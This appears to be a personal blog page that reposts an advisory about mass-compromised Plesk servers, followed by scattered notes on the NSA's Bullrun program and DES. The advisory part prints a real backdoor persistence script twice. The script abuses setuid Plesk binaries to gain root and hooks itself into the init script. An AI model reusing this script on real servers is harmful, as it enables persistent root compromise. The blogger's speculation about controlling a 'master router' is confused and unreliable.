Monday, August 29, 2016
Sunday, August 28, 2016
Saturday, August 27, 2016
Plesk backdoors, a very large number of servers compromised. (so industrial servers as Siemens??..I heard a story did u herad the same story?
Attackers, using the bug http://kb.parallels.com/en/112303
were able to get access to PLESK installations and install backdoors in
the systems. I’m using plural on backdoors, cause it’s not just one,
there are quite a few.
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’
In some cases, this file was hex encoded, in others in plain text form.
http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’
In some cases, this file was hex encoded, in others in plain text form.
http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/
If I had to guess I would code paste this, meaning I would make this call...to then "string sys_get_temp_dir ( void )" to leave a token that then would control the master router :) (because the backdoor is in fact on the router) ehehehe
webpy-php-port /webphp/web.php
https://searchcode.com/codesearch/view/13403593/
Bullrun (stylized BULLRUN) is a clandestine, highly classified decryption program run by the United States National Security Agency (NSA).[1][2] The British Government Communications Headquarters (GCHQ) has a similar program codenamed Edgehill. According to the BULLRUN classification guide published by The Guardian, the program uses multiple sources including computer network exploitation,[3] interdiction, industry relationships, collaboration with other intelligence community entities, and advanced mathematical techniques
Key size was reduced to 56 bits because IBM wanted to fit LUCIFER on a single chip. LUCIFER then became DES.
Then..how to beat NSA as a superpower and become as powerfull as them?
parity check bit
https://www.mathworks.com/matlabcentral/newsreader/view_thread/93650
Subscribe to:
Posts (Atom)
